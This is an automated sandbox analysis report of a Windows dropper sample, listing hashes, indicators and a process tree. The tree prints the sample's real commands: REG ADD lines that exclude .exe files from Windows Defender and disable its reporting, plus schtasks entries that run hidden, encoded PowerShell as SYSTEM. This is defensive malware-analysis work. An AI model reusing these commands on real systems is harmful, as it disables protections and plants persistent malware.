Analysis
-
max time kernel
92s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
27/09/2022, 23:01
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
5eb69c0ca6e332148116ae0ee983244f
-
SHA1
02db54940d2d2d8a45ee1c4a3c796784abc48c5b
-
SHA256
fd5c05ba8b0b3565d2dc29f8f849bcaca1b7b8880a965b4a9f314b8b100d98dc
-
SHA512
bcb4605f29468d635a80bb25bbee54e330aa2eb274d36586987f467507bc06af449e6a54dc55730950dc72d4f7e7a5786813f412d540b72307745c9d99a6b1cc
-
SSDEEP
196608:91O6XhxFlmDesemftcv9eih+fCiUdKGsBIm0niiJbZ+nq:3OqhBoFMtziUoGIIm8iimq
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 86 2516 rundll32.exe 88 2516 rundll32.exe 90 2516 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4144 Install.exe 1992 Install.exe 5060 mdUmjmI.exe 1448 kowDcWE.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation kowDcWE.exe -
Loads dropped DLL 1 IoCs
pid Process 2516 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json kowDcWE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json kowDcWE.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json kowDcWE.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini kowDcWE.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 kowDcWE.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini mdUmjmI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol mdUmjmI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kowDcWE.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol kowDcWE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 kowDcWE.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\WrbOaSOTQfUn\deaGdOa.dll kowDcWE.exe File created C:\Program Files (x86)\jNivjIkKU\micJLR.dll kowDcWE.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\HiuSbZF.dll kowDcWE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kowDcWE.exe File created C:\Program Files (x86)\jNivjIkKU\taARNDf.xml kowDcWE.exe File created C:\Program Files (x86)\qmpQQWMVoUOWcEJKBJR\omkunSD.xml kowDcWE.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\qpZvSWl.dll kowDcWE.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kowDcWE.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kowDcWE.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\oOIpNuc.xml kowDcWE.exe File created C:\Program Files (x86)\HCxyEYsLPoBU2\ImuiEcMJrLJRQ.dll kowDcWE.exe File created C:\Program Files (x86)\VYxEjiIKDDwYC\pvihkDq.xml kowDcWE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi kowDcWE.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja kowDcWE.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bGKvUxYEKJhmpNiCsB.job schtasks.exe File created C:\Windows\Tasks\GyQsokuHCPHrPIKjm.job schtasks.exe File created C:\Windows\Tasks\ydofTeYvCFRiBkl.job schtasks.exe File created C:\Windows\Tasks\BTdQtQCLlbasEjBtK.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1784 schtasks.exe 808 schtasks.exe 3208 schtasks.exe 4264 schtasks.exe 3564 schtasks.exe 3600 schtasks.exe 2300 schtasks.exe 5084 schtasks.exe 4356 schtasks.exe 4768 schtasks.exe 3108 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing kowDcWE.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume kowDcWE.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{2339e045-0000-0000-0000-d01200000000}\NukeOnDelete = "0" kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "4" kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kowDcWE.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" kowDcWE.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 4796 powershell.EXE 4796 powershell.EXE 4884 powershell.exe 4884 powershell.exe 3976 powershell.exe 3976 powershell.exe 3356 powershell.EXE 3356 powershell.EXE 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe 1448 kowDcWE.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4796 powershell.EXE Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 3356 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1260 wrote to memory of 4144 1260 file.exe 85 PID 1260 wrote to memory of 4144 1260 file.exe 85 PID 1260 wrote to memory of 4144 1260 file.exe 85 PID 4144 wrote to memory of 1992 4144 Install.exe 86 PID 4144 wrote to memory of 1992 4144 Install.exe 86 PID 4144 wrote to memory of 1992 4144 Install.exe 86 PID 1992 wrote to memory of 2200 1992 Install.exe 90 PID 1992 wrote to memory of 2200 1992 Install.exe 90 PID 1992 wrote to memory of 2200 1992 Install.exe 90 PID 1992 wrote to memory of 480 1992 Install.exe 92 PID 1992 wrote to memory of 480 1992 Install.exe 92 PID 1992 wrote to memory of 480 1992 Install.exe 92 PID 2200 wrote to memory of 2836 2200 forfiles.exe 94 PID 2200 wrote to memory of 2836 2200 forfiles.exe 94 PID 2200 wrote to memory of 2836 2200 forfiles.exe 94 PID 480 wrote to memory of 1848 480 forfiles.exe 95 PID 480 wrote to memory of 1848 480 forfiles.exe 95 PID 480 wrote to memory of 1848 480 forfiles.exe 95 PID 2836 wrote to memory of 3224 2836 cmd.exe 97 PID 2836 wrote to memory of 3224 2836 cmd.exe 97 PID 2836 wrote to memory of 3224 2836 cmd.exe 97 PID 1848 wrote to memory of 4280 1848 cmd.exe 96 PID 1848 wrote to memory of 4280 1848 cmd.exe 96 PID 1848 wrote to memory of 4280 1848 cmd.exe 96 PID 2836 wrote to memory of 4612 2836 cmd.exe 98 PID 2836 wrote to memory of 4612 2836 cmd.exe 98 PID 2836 wrote to memory of 4612 2836 cmd.exe 98 PID 1848 wrote to memory of 1276 1848 cmd.exe 99 PID 1848 wrote to memory of 1276 1848 cmd.exe 99 PID 1848 wrote to memory of 1276 1848 cmd.exe 99 PID 1992 wrote to memory of 3564 1992 Install.exe 104 PID 1992 wrote to memory of 3564 1992 Install.exe 104 PID 1992 wrote to memory of 3564 1992 Install.exe 104 PID 1992 wrote to memory of 1216 1992 Install.exe 106 PID 1992 wrote to memory of 1216 1992 Install.exe 106 PID 1992 wrote to memory of 1216 1992 Install.exe 106 PID 4796 wrote to memory of 4404 4796 powershell.EXE 110 PID 4796 wrote to memory of 4404 4796 powershell.EXE 110 PID 1992 wrote to memory of 2628 1992 Install.exe 119 PID 1992 wrote to memory of 2628 1992 Install.exe 119 PID 1992 wrote to memory of 2628 1992 Install.exe 119 PID 1992 wrote to memory of 4356 1992 Install.exe 121 PID 1992 wrote to memory of 4356 1992 Install.exe 121 PID 1992 wrote to memory of 4356 1992 Install.exe 121 PID 5060 wrote to memory of 4884 5060 mdUmjmI.exe 126 PID 5060 wrote to memory of 4884 5060 mdUmjmI.exe 126 PID 5060 wrote to memory of 4884 5060 mdUmjmI.exe 126 PID 4884 wrote to memory of 2340 4884 powershell.exe 128 PID 4884 wrote to memory of 2340 4884 powershell.exe 128 PID 4884 wrote to memory of 2340 4884 powershell.exe 128 PID 2340 wrote to memory of 3100 2340 cmd.exe 129 PID 2340 wrote to memory of 3100 2340 cmd.exe 129 PID 2340 wrote to memory of 3100 2340 cmd.exe 129 PID 4884 wrote to memory of 5072 4884 powershell.exe 130 PID 4884 wrote to memory of 5072 4884 powershell.exe 130 PID 4884 wrote to memory of 5072 4884 powershell.exe 130 PID 4884 wrote to memory of 2488 4884 powershell.exe 131 PID 4884 wrote to memory of 2488 4884 powershell.exe 131 PID 4884 wrote to memory of 2488 4884 powershell.exe 131 PID 4884 wrote to memory of 3472 4884 powershell.exe 132 PID 4884 wrote to memory of 3472 4884 powershell.exe 132 PID 4884 wrote to memory of 3472 4884 powershell.exe 132 PID 4884 wrote to memory of 3884 4884 powershell.exe 133 PID 4884 wrote to memory of 3884 4884 powershell.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\7zSAACB.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4144 -
C:\Users\Admin\AppData\Local\Temp\7zSAE27.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:3224
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4612
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4280
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1276
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzKJvaQCv" /SC once /ST 09:33:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:3564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzKJvaQCv"4⤵PID:1216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzKJvaQCv"4⤵PID:2628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGKvUxYEKJhmpNiCsB" /SC once /ST 23:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe\" G6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4356
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4404
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1596
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3556
-
C:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exeC:\Users\Admin\AppData\Local\Temp\gnTHsduzYZxvJbBhx\edOhJgpRjaWAiDb\mdUmjmI.exe G6 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:5060 -
